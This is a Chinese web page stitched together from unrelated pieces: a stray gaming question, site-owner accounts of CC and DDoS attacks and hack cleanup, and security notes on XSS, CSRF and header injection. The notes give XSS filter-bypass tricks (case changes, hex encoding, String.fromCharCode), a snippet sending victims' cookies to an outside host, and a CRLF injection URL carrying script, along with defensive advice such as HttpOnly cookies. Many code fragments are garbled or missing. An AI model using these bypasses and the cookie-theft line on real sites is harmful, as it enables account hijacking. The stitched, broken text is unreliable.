就是该怎样提高物攻,我已经找不到u盘解决方法方法了

> 网站被攻击怎么办
  随着互联网的发展,越来越多的人们开始认识到网络宣传的优越性。大大小小的网站层出不穷。然而随着网站数量的增加,出现的问题也大大增多。同行之间的竞争、也随之体现在了网络之间。一些不法分子也逐渐转移阵地到网络上来谋取利益。同行之间往往雇佣黑客打压对手攻击对方网站,甚至有些人故意攻击别人网站索要保护费。不给钱就攻击你,让你网站瘫痪。对于这类事情,网站主往往是求助无门干着急,不得已妥协。  各位站长在做站的工程中应该都会遇到类似的问题,虽然我们勤勤恳恳的做自己的站,但是突然有一天会发现我们的网站突然就被人黑了,这时候只要我们打开自己网站的时候展现在我们面前的画面往往会让我们崩溃不已,此时各位站长的内心肯定是恨的牙痒痒,但是没有办法我们不惹别人,别人不一定就不惹我们,虽然心里很不舒服,但是问题也是需要解决的。  网站攻击一般分为3类,分别为ARP欺骗攻击、CC攻击、DDOS流量攻击。  一、先说ARP欺骗攻击  如果要发起ARP欺骗攻击,首先要与网站为同一个机房、同一个IP段、同一个VLAN的服务器的控制权,采用入侵别的服务器的方式。拿到控制权后利用程序伪装被控制的机器为网关欺骗目标服务器。这种攻击一般在网页中潜入代码或者拦截一些用户名和密码。对付这类攻击比较容易,直接通知机房处理相应的被控制的机器就可以了。  二、CC攻击  相对来说,这种攻击的危害大一些。主机空间都有一个参数 IIS 连接数,当被访问网站超出IIS 连接数时,网站就会出现Service Unavailable 。攻击者就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了。对于达到百兆的攻击,防火墙就相当吃力,有时甚至造成防火墙的CPU资源耗尽造成防火墙死机。达到百兆以上,运营商一般都会在上层路由封这个被攻击的IP。  针对CC攻击,一般的租用有防CC攻击软件的空间、VPS或服务器就可以了,或者租用章鱼主机,这种机器对CC攻击防御效果更好。  三、流量攻击  就是DDOS攻击,这种攻击的危害是最大的。原理就是向目标服务器发送大量数据包,占用其带宽。对于流量攻击,单纯地加防火墙没用,必须要有足够的带宽和防火墙配合起来才能防御。如果想防御10G 的流量攻击,那就必须用大约20G 的硬件防火墙加上近20G 的带宽资源。如果单用硬防机器的成本相当高,10G硬防也要上万元一个月。但是,如果用集群防护(章鱼主机)的话,那成本就要低的多了。  网站被被攻击了,我们应该怎么解决呢?  首先查看网站的服务器  当我们发现网站被攻击的时候不要过度惊慌失措,先查看一下网站服务器是不是被黑了,找出网站存在的黑链,然后做好网站的安全防御,具体操作分为三步  1、开启IP禁PING,可以防止被扫描。  2、关闭不需要的端口。  3、打开网站的防火墙。  这些是只能防简单的攻击,如果你觉得太麻烦那可以搜索(红盾 免费对抗攻击),在被攻击时,找上面的技术员,那里有免费帮你对抗攻击的服务。  网站为什么会被黑  网站挂马是每个站长最头痛的问题,个人认为网站被黑的原因一般分为两种  一、服务器空间商的安全 导致被牵连 二、=种是网站程序的安全自身的程序安全漏洞被黑被入侵被挂马。有条件的话可以找专业做安全的去看看. 公司的话可以去Sine安全看看听朋友说不错。一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了。  解决办法:  1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的办法还是找专业的程序员解决是最直接的。  清马+修补漏洞=彻底解决所谓的挂马,就是heike通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。  上面可以用netstat -an cmd命令可以查看无数的tcp链接,ip都是不一样的,由于我的是cpu是单核的,不抗防的,实在是单薄,抗击不了,我就直接在iis上取消绑定被攻击域名,进行资源永久性的跳转到另外一个域名,不过没有坚持多久,就被对方识破了,新的跳转的域名照样被攻击了!  网站服务器上也***了服务器安全狗,网站iis安全狗,偶尔能抵挡一下,之前是默认设置的,后来问道一个高手,之前也一直防御等级没设置好,应该是这样的设置的,设置之后明显下面的cc攻击抵挡住多了,  设置之后是这样提示点击进去之后 才能访问的,虽然不利于seo,但总比打不开要好,能防御机器的攻击了!  还有一个就是大家可以尝试一下各种 云加速的域名解析,也有一定的效果,我之前也找了,百度云加速,把域名解析服务器地址修改位百度的就行了,我防御了一段时间,效果挺好,不知道怎么回事,第二天可能是加大攻击了,还是cpu 100%,另外好多的加速服务器都需要备案的,之前我这个网站也没有备案,一下子换空间等等都有所限制了!  后来网站一直处于断断续续状态,直到我的备案下拉了,换了一个朋友的服务器,8核的,那个攻击再疯狂,cpu也就50%左右,攻击了几天,后面好像就没下文了,此处还有那个给我临时会话了,一段很搞笑的对话,就不为大家公布了!  建站一个月以来,连续遭遇2次黑客攻击,但是由于本站的wordpress程序版本新、密码强度高,安全设置权限较高,因此虽然遭遇了2次黑客攻击,但是黑客攻击一直未能得逞。下面附一张日黑客攻击截图:  seo学堂-黑客攻击截图  由上图可以看出,该黑客先是在seo学堂,注册了一个用户名,然后登陆进入站内,最后尝试在帖子留言处,利用代码试图突破网站管理权限,前前后后一共尝试了42次,都未能成功。通过这个黑客攻击行为,作为中小站长的我们,应该如何应对,以下是我总结的防范黑客攻击的8条措施:  1、确保你的杀毒软件是最新的  确保你的杀毒软件使用的是最新的病毒定义文件是非常至关重要的。如果你使用Windows系统并且还没有***杀毒软件,你可以使用免费版的 avast和***G以及360杀毒软件,这两个杀毒软件都算是大家耳熟能详的。***完之后下载所有的更新,接着下面的步骤。  2、将被攻击页面保存到你的电脑中  如果你选择报告黑客的话就有必要对被攻击页面进行备份。另外,如果你决定写篇文章来通知其他人,备份之后你可以获得截图以及文本例子。保存页面相信大家都会,浏览器菜单栏的 文件 -& 页面另存为… 将页面保存在你的电脑上(建议不要保存在C盘)。在保存页面的时候,保存类型选项记得选择“网页,全部” ,然后点击保存即可。  3、下载最新的WordPress版本  当前最新版是WordPress4.0。wordpress兼顾了安全性与便利性,但是一定要记得及时更新最新版本,消除系统潜在隐患漏洞。  4、清理服务器上所有受影响的文件夹和文件  有了最新版的WordPress之后,你就可以将服务器上所有不必要的文件删除。不用担心,你的数据库中有你所有一切的数据,包括,你的博客文章、页面、分类、标签等等。如果很不幸你的数据库也遭受攻击了,那希望你一直都有备份。下面是你不应该删除的文件夹和文件:  不要删除最初的文件夹 (如., stats)  不要删除 ‘wp-content’ 文件夹 (主题内容,有时也有插件内容)  不要删除.htaccess文件 (固定链接结构、权限、密码等)  不要删除 favicon.ico文件(URL地址左边的自定义图标)  不要删除 google…html文件 (谷歌网站管理员工具验证)  不要删除wp-config.php文件  5、上传完最新的WordPress版本之后,你可以放心地删除下面的文件:  删除 /wp-admin/install.php文件 (不再需要)  删除 /readme.html (防止用户看到WordPress版本)  6、参加百度站长平台,定期检测网站安全漏洞,发现漏洞,及时修复  最后要提醒一下各位新手站长,一定要在建站前,就要选择安全性相对较高,易用性相对较高的建站程序,然后选择安全性高、正规口碑运营俱佳的主机提供商,然后再开始建站也不迟,网站安全是第一位,失去安全,您付出的所有努力,到最后都可能是竹篮打水一场空。网站被cc攻击怎么办  现在网络竞争越来越激烈,在平等竞争的同时也有一些令人唾弃的竞争方式。现在一般草根站长也就做做百度优化,我也是其中的一员。发外链啊,推广啊,好不容易才做到百度首页。好了,做到百度首页了,以为爽了,来流量了,也不枉那么辛苦啊。。。呵呵,但是悲催的事情来了,同行嫉妒竞争,竟然给你来了个cc攻击,直接cpu占用100%,网站瘫痪了,最坑爹的是他晚上三四点开始给你攻击,等你早上起来发现网站打不开了。才想办法解决。但是这样用户体验差了,排名或许也掉了。我就是从第六掉到第10。  看到网站cpu占用100%了,我以为是怎么回事,从启下了vps,还是一样。网站打不开啊,急死人了。找vps商,叫我下载安全狗,下载了安全狗之后一查,啊。cc攻击啊。然后即挂着安全狗,以为能防住,哪想到也就防了一会,马上就cpu又100%了。然后就去找了很多vps技术。买的vps多了,认识的技术也就多了嘛。坑爹的是多给你来一句,cc攻击基本防不住。我那个崩溃啊。  后来一个技术跟我说程序死循环也会出现这种情况,但是程序一直好好的,用dedecms,没有修改怎么会出错。我也不想那么多,直接把程序文件都删了,只留下生成的html文件。呀,cpu占用下降了。呵呵,难道是程序原因。后来我反复***了好几遍程序,都是新下载的,每次一解析域名过去,马上cpu占用100%,怎么回事?难道不是程序问题。这时候又纠结了。  后来看了下日志文件。靠日志文件这么大。流量不大,文件这么大。打开一看。清一色的一样的浏览记录,估计了下,每分钟大概好几千次。vps哪里受得了啊。后来我想想,把被攻击的文件删了,会不会有效果。果然,文件删了之后cpu占用就下降了,呵呵高兴啊。终于解决了。解决了之后看日志文件,还在攻击啊,日志文件大小以肉眼可看的在增加。不过cpu下降了,网站能访问了。  不过如果他改了攻击文件我的网站就会瘫痪了,没办法我现在就这样僵持着,他攻击什么文件我就修改什么文件。如果有谁能有其他的方法请教教我。谢谢!在这里我要疼彻控诉那些卑鄙的攻击别人网站的人。还有,希望看到我文章的人能有受益,遇到这种情况至少还能像我一样解决下。什么是CC攻击 如何防止网站被CC攻击  CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一直到宕机崩溃。  CC攻击的攻击技术含量低,利用工具和一些IP代理,一个初、中级的电脑水平的用户就能够实施攻击。不过,如果了解了CC攻击的原理,那就不难针对CC攻击实施一些有效的防范措施。  通常防止CC攻击的方法有几种,一个是通过防火墙,另外一些网络公司也提供了一些防火墙服务,例如XX网站卫士和XX宝,还有一种方法是自己写程序预防,昨天网站遇到CC攻击,这也让我尝试了一下各种防止CC攻击方法的有效性。  一开始我想使用某某网站卫士来预防攻击,从界面上看,似乎是防止了大量的CC攻击,但登录网站后发现,流量依旧异常,攻击还是依旧,看起来这个网站卫士的效果并没有达到。  从原理上看,基本上所有的防火墙都会检测并发的TCP/IP连接数目,超过一定数目一定频率就会被认为是Connection-Flood。但如果IP的数量足够大,使得单个IP的连接数较少,那么防火墙未必能阻止CC攻击。  实际上,通过分析网站日志,还是很容易分辨出哪个IP是CC攻击的,因为CC攻击毕竟是通过程序来抓取网页,与普通浏览者的特性区别还是很大的,例如普通浏览者访问一个网页,必定会连续抓取网页的HTML文件、CSS文件、JS文件和图片等一系列相关文件,而CC攻击者仅仅只会抓取一个URL地址的文件,不会抓取其他类型的文件,其User Agent也大部分和普通浏览者不同,这就可以在服务器上很容易分辨出哪些访问者是CC攻击了,既然可以判断出攻击者的IP,那么预防措施就很简单,只需要批量将这些IP屏蔽,即可达到防范CC攻击的目的。  最终,我花了半个小时写了一段小程序,运行之后自动屏蔽了数百个IP,网站才算正常,从而证明,防火墙对于CC攻击的防御并不有效,最有效的方法还是在服务器端通过程序自动屏蔽来预防。  看来CC攻击的门槛还真低啊,搞个几百个代理或者肉鸡就能攻击别人了,其成本非常低,但效果比较明显,如果攻击者流量巨大的话,通过耗费带宽资源的方式都可以进行攻击。但是,CC攻击也有明显的技术缺陷,就是攻击者的IP并不是海量的,通常就是几百数千的级别,并且是真实访问了网站页面,这就使得网站可以通过程序过滤的方式,轻松获取到这些攻击者IP,批量进行屏蔽,那么这种CC攻击就会得到防。  随着网络信息的发展,现在做网站的人越来越多。有些人做网站是为了学习,有些人做网站是为赚钱等等,不管是为了什么原因吧,网站是越来越多啦。网站越来越自然而然做坏事的人也越来越多啦。当你的网站成型之后,可能就会时不时被别人攻击,严重到一定程度的,会导致网站打不开,甚至服务器瘫痪。  那导致网站网站被攻击到打不开的原因有几种呢?我们应该如何排查?现在群英小编给大家普及一下:  第一:ddos攻击  第一步首要判别是不是网站地点的服务器受到了DDOS攻击,认为咱们如今不能扫除是不是有同行业的人进行不正常的竞争,雇人对兄弟的服务器进行 DDOS攻击。DDoS的攻击方式有很多种,最基本的DoS攻击即是使用合理的服务请求来占用过多的服务资本,从而使服务器无法处置合法用户的指令。我给担任供给托管服务的IDC接入商打***,让他们的技能查一查是不是DDOS攻击。咱们查往后说没有,可是发现了兄弟网站的带宽跑的好高。  2、网站空间  第二步我们查看是不是服务器网站空间或是带宽有了问题,可是服务商那里查看出来的成果没有问题。我们也知道到了不是服务器的问题,由于我们能够正常 翻开同一个服务器是另外网站。可是兄弟网站的带宽跑的超乎寻常的高,尽管这几天访问量很高,可是这种现象也很不正常。为此,服务商现已几回给兄弟的网站增 加了带宽,可是问题依然存在。疑云满布在咱们的心头。  3、网站域名  第三步我们查看是不是域名的问题。查询了下,域名解析正常,也没有到期,域名没有问题。可是当改用IDC供给商供给的3级域名以后,网站能够翻开正 常的访问。我们陷入了迷惑当中,最终知道是有人对我们的这个网站域名进行了损害性的攻击,可是究竟是什么攻击,如今还剖析不出来。可是这个时分替换域名是不能够的,品牌广告都打出去了,宣扬的时分网站选用的都是这个网址。这个时分替换,曾经的所走的一切都将功败垂成。  4、网站程序  第四步我们查看网站的程序是不是呈现了问题,被人抓住了缝隙进行攻击。我试着修正代码,总算发现了数据库有点不正常。把数据库停掉以后,网站居然可以顺畅的翻开了。我们一阵欣喜,可是数据库是不能停掉的,停掉数据库的写入操作,认为着会员注册和商品订单的中止。所形成的丢失也是无法拟补的。持续排查,总算想到了一种能够,是不是有人使用动易的缝隙最数据库攻击,频频的在进行采购订单然后撤销订单操作。致使了网站的流量过大,网站无法打开。网站被黑了怎么办  您的用户网站被黑,有以下几种原因造成的:  1. 是您的客户的网站代码有问题,存在安全漏洞造成的。  如果您的服务器上大部分用户的网站都正常,只有少量用户网站被黑,那  么就很可能是您少量用户网站被黑的网站代码有问题,存在安全漏洞造  成的。造成这个问题是没有办法解决,也不是您的责任。  分析说明:  1). 大家都知道,“虚拟主机提供商”对自己的每个虚拟主机用户  都分配了FSO文件操作的权限,他们通过您分配的合法权限,可  以任意改动和上传的任何文件。如果您的用户没有保护好您分  配给他们的合法权限,令黑客有机可乘,那么,黑客就可以利用  您提供给您用户的合法权限对网站进行破坏,但是您的用户认  为这个黑客入侵不是他自己造成的,是您造成的,而您听信了您  用户的话,误认为是自己的系统有问题导致的,但是,其实问题  就是您的用户自己造成的。  例如,您的用户使用了一些不安全的程序(如“洞网论坛”),这些  程序的代码设计本身存在漏洞,很容易被黑客利用来上传网页  木马,黑客可以操纵网页木马,利用您分配的给用户的合法权  限来破坏您用户的数据和改动网页的文件,甚至导致网站完全  打不开。这些手法是最常见的“客户的网站代码有问题,存在  安全漏洞造成的”。  2). 当您的客户网站被黑的时候,您不需要跟着他干着急,首先这  种方式入侵不会影响您的服务器的正常运营 ,也不会影响您  整台服务器上的其他网站正常客户,因为您只要***了[星外  虚拟主机管理平台]的服务器都会受到很安全的保护,凡是使  用[星外虚拟主机管理平台]开通的每一个虚拟主机用户的权  限都是独立并受到严格的限制,而且每个虚拟主机用户都不能  使用别的虚主机用户的文件,就黑客就算入侵了其中一个虚拟  主机,也没有办法破坏别的虚拟主机。所以,您完全可以放心  自己服务器是安全的。  3). 当您的用户网站被黑时,您只有如实告诉您的用户,这是他自  己网站代码有问题造成的,您没有办法为他解决。因为这不是  您造成的,您也不可能去帮他重新设计有安全问题的代码,因  为您不是他们的程序员,没有义务做这样的事情,让您客户自  己修改网页代码,做好安全设置。  4). 如果您的客户自己有备份过网站,您可以建议他重新改好代  码,然后重新上传,就可以恢复网站的访问。  -----------------------------------------------------------------------------------------------------------------  2. 是您的服务器被入侵导致的。  当您的服务器上的所有用户网站都被增加了病毒代码,而且这个病毒代  码在服务器上的原始文件中“可以找到”,就表明您的服务器被入侵  导致的。  原因:您的服务器被入侵,说明您的服务器上的安全设置没有按照[星  外虚拟主机管理平台]“安全视频教程”的要求来设置,才会导  致了您服务器上的原始文件被黑客改写,造成了您的所有用户网  站被入侵。  解决办法:  我们建议您重装系统并需要根据[星外虚拟主机管理平台]“安  全视频教程”的要求来设置重新设置您的服务器的安全,才能彻  底解决您服务器上的安全漏洞,彻底清除黑客留下的后门。  3. 是您的服务器所在的机房中了ARP病毒导致的。  当您的服务器上的所有用户网站都被增加了病毒代码,而且这个病毒代  码在服务器上的原始文件中“找不到”,就表明您的服务器所在的机房  中了ARP病毒导致的。
【上一篇】
【下一篇】
  企业微信有哪些功能?企业微信有什么用?4月18日,腾…
  UGC(User Generated Content)指用户原创内容,是伴随着以提倡个性化为主要特点的Web2.0概念而兴起的。它并不是某一种具体的业…
SEO学堂()是一个有态度的、个性化资讯与交流平台,全方位的解读当下社会热点、历史、互联网等事件,致力于独立、前瞻、深入的分析评论。3119人阅读
最简单的就是改变大小写
在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则
比如:&可以转换为:
其次关闭标签也可以
有时我们需要关闭标签来使我们的XSS生效,如:
使用HEX编码来绕过
我们可以对我们的语句进行hex编码来绕过XSS规则。
比如:&可以转换为:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
绕过 magic_quotes_gpc
magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为\’,”(双引号)转换为\” ,\转换为\\
比如:会转换为,这样我们的xss就不生效了。
针对开启了magic_quotes_gpc的网站,我们可以通过javascript中的String.fromCharCode方法来绕过,我们可以把alert(“XSS”);转换为
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)那么我们的XSS语句就变成了
String.fromCharCode()是javascript中的字符串方法,用来把ASCII转换为字符串。
最后使用包含即可。
HEX编码在线工具:
/ASCII-Hex-Unicode-Base64-Converter.html
www服务依赖于Http协议实现,Http是无状态的协议,所以为了在各个会话之间传递信息,就不可避免地用到Cookie来标记访问者的状态。只要获得这个Cookie,就可以取得别人的身份,入侵个人账户或者网站。
对于网站来说,一旦存在了xss漏洞就意味着入侵者可以在浏览器中执行任意的JS脚本,这时候获得Cookie就变得非常的简单。Cookie保存在浏览器的document对象中,只要使用JS读取Cookie就能拥有其他人的身份。一个很简单的xss攻击语句如下:
url=document.top.location.
cookie=document.
c=newImage();
c.src=&http://www.xss-/c.php?c=&+cookie+&&u=&+
有些网站考虑到这个问题,所以采取浏览器绑定技术,譬如将Cookie和浏览器的User-agent绑定,一旦发现修改就认为Cookie失效。但是这种方法存在很大的弊端,因为当入侵者偷得Cookie的同时他肯定已经同时获得了User-agent。还有另外一种比较严格的是将Cookie和Remote-addr相绑定(其实就是和IP绑定),但是这样有可能带来比较差的用户体验,比如家里的ADSL就是每次连接换一个IP地址。
那如何保障我们的敏感Cookie安全呢?通过上面的分析,一般的Cookie都是从document对象中获得的,我们只要让敏感Cookie在浏览器document中不可见就行了。Microsoft Internet Explorer 版本 6 Service Pack 1 和更高版本支持 Cookie 属性 Http-Only,该属性有助于缓解跨站点脚本威胁, 如果兼容浏览器接收到 Http-Only Cookie,则客户端脚本不能对它进行访问。Http-Only的参数跟domain等其他参数一样,一旦Http-Only被设置,你在浏览器的document对象中就看不到Cookie了,而浏览器在浏览的时候不受任何影响,因为Cookie会被放在浏览器头中发送出去(包括ajax的时候),应用程序也一般不会在js里操作这些敏感Cookie的,对于一些敏感的Cookie我可以采用Http-Only,对于一些需要在网站中用js操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了网站的基本功能。
下面的例子就是Http-Only的设置方法(注意,HttpOnly属性对大小写不敏感):
Set-Cookie:&=[;&=] [; expires=][; domain=][; path=][; secure][; HttpOnly]
Asp.Net设置HttpCookie.HttpOnly 属性的方法:/zh-cn/library/system.web.httpcookie.httponly.aspx
目前主流的浏览器基本上已经都支持了Http-Only属性,具体支持的浏览器请查看:https://www.owasp.org/index.php/HttpOnly
另外,HttpOnly并不是万能的,首先它并不能解决xss的问题,仍然不能抵制一些有耐心的黑客的攻击,也不能防止入侵者做ajax提交。为了降低跨站点脚本攻击带来的损害,通常需要将HTTP-only Cookie和其他技术组合使用。如果单独使用的话,它无法全面抵御跨站点脚本攻击。比如如果你的站点是使用Asp.Net开发的话,建议使用Microsoft Web Protection Library
一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种漏洞情况和防止攻击的办法.
一.跨站脚本攻击(XSS)
&&& 跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击WEB网站的方法。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时,特定的脚本就会以浏览者用户的身份和权限来执行。通过XSS可以比较容易地修改用户数据、窃取用户信息,以及造成其它类型的攻击,例如CSRF攻击
&&&& 常见解决办法:确保输出到HTML页面的数据以HTML的方式被转义
&&&&& 出错的页面的漏洞也可能造成XSS攻击.比如页面/gift/giftList.htm?page=2找不到,出错页面直接把该url原样输出,如果攻击者在url后面加上攻击代码发给受害者,就有可能出现XSS攻击
&二. 跨站请求伪造攻击(CSRF)
&& & 跨站请求伪造(CSRF,Cross-site request forgery)是另一种常见的攻击。攻击者通过各种方法伪造一个请求,模仿用户提交表单的行为,从而达到修改用户的数据,或者执行特定任务的目的。为了假冒用户的身份,CSRF攻击常常和XSS攻击配合起来做,但也可以通过其它手段,例如诱使用户点击一个包含攻击的链接
&&& 解决的思路有:
&&&&& 1.采用POST请求,增加攻击的难度.用户点击一个链接就可以发起GET类型的请求。而POST请求相对比较难,攻击者往往需要借助javascript才能实现
&&&&& 2.对请求进行认证,确保该请求确实是用户本人填写表单并提交的,而不是第三者伪造的.具体可以在会话中增加token,确保看到信息和提交信息的是同一个人
三.Http Heads攻击
&& 凡是用浏览器查看任何WEB网站,无论你的WEB网站采用何种技术和框架,都用到了HTTP协议.HTTP协议在Response header和content之间,有一个空行,即两组CRLF(0x0D 0A)字符。这个空行标志着headers的结束和content的开始。“聪明”的攻击者可以利用这一点。只要攻击者有办法将任意字符“注入”到headers中,这种攻击就可以发生
&& 以登陆为例:有这样一个url:
http://localhost/login?page=http%3A%2F%2Flocalhost%2Findex
当登录成功以后,需要重定向回page参数所指定的页面。下面是重定向发生时的response headers.
HTTP/1.1 302 Moved Temporarily
Date: Tue, 17 Aug :29 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://localhost/index
假如把URL修改一下,变成这个样子:
http://localhost/login?page=http%3A%2F%2Flocalhost%2Fcheckout%0D%0A%0D%0A%3Cscript%3Ealert%28%27hello%27%29%3C%2Fscript%3E
那么重定向发生时的reponse会变成下面的样子:
HTTP/1.1 302 Moved Temporarily
Date: Tue, 17 Aug :29 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://localhost/checkout&CRLF&
&script&alert('hello')&/script&
&&&&& 这个页面可能会意外地执行隐藏在URL中的javascript。类似的情况不仅发生在重定向(Location header)上,也有可能发生在其它headers中,如Set-Cookie header。这种攻击如果成功的话,可以做很多事,例如:执行脚本、设置额外的cookie(&CRLF&Set-Cookie: evil=value)等。
&&&& 避免这种攻击的方法,就是过滤所有的response headers,除去header中出现的非法字符,尤其是CRLF。
&&&&& 服务器一般会限制request headers的大小。例如Apache server默认限制request header为8K。如果超过8K,Aapche Server将会返回400 Bad Request响应:
&&&&& 对于大多数情况,8K是足够大的。假设应用程序把用户输入的某内容保存在cookie中,就有可能超过8K.攻击者把超过8k的header链接发给受害者,就会被服务器拒绝访问.解决办法就是检查cookie的大小,限制新cookie的总大写,减少因header过大而产生的拒绝访问攻击
四.Cookie攻击
&&&&& 通过Java Script非常容易访问到当前网站的cookie。你可以打开任何网站,然后在浏览器地址栏中输入:javascript:alert(doucment.cookie),立刻就可以看到当前站点的cookie(如果有的话)。攻击者可以利用这个特性来取得你的关键信息。例如,和XSS攻击相配合,攻击者在你的浏览器上执行特定的Java Script脚本,取得你的cookie。假设这个网站仅依赖cookie来验证用户身份,那么攻击者就可以假冒你的身份来做一些事情。
&&&&& 现在多数浏览器都支持在cookie上打上HttpOnly的标记,凡有这个标志的cookie就无法通过Java Script来取得,如果能在关键cookie上打上这个标记,就会大大增强cookie的安全性
五.重定向攻击
&&& 一种常用的攻击手段是“钓鱼”。钓鱼攻击者,通常会发送给受害者一个合法链接,当链接被点击时,用户被导向一个似是而非的非法网站,从而达到骗取用户信任、窃取用户资料的目的。为防止这种行为,我们必须对所有的重定向操作进行审核,以避免重定向到一个危险的地方.常见解决方案是白名单,将合法的要重定向的url加到白名单中,非白名单上的域名重定向时拒之,第二种解决方案是重定向token,在合法的url上加上token,重定向时进行验证.
六.上传文件攻击
&&& 1.文件名攻击,上传的文件采用上传之前的文件名,可能造成:客户端和服务端字符码不兼容,导致文件名乱码问题;文件名包含脚本,从而造成攻击.
&&&& 2.文件后缀攻击.上传的文件的后缀可能是exe可执行程序,js脚本等文件,这些程序可能被执行于受害者的客户端,甚至可能执行于服务器上.因此我们必须过滤文件名后缀,排除那些不被许可的文件名后缀.
&&& 3.文件内容攻击.IE6有一个很严重的问题 , 它不信任服务器所发送的content type,而是自动根据文件内容来识别文件的类型,并根据所识别的类型来显示或执行文件.如果上传一个gif文件,在文件末尾放一段js攻击脚本,就有可能被执行.这种攻击,它的文件名和content type看起来都是合法的gif图片,然而其内容却包含脚本,这样的攻击无法用文件名过滤来排除,而是必须扫描其文件内容,才能识别。
参考知识库
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:111876次
积分:1756
积分:1756
排名:第16583名
原创:61篇
转载:42篇

参考资料

 

随机推荐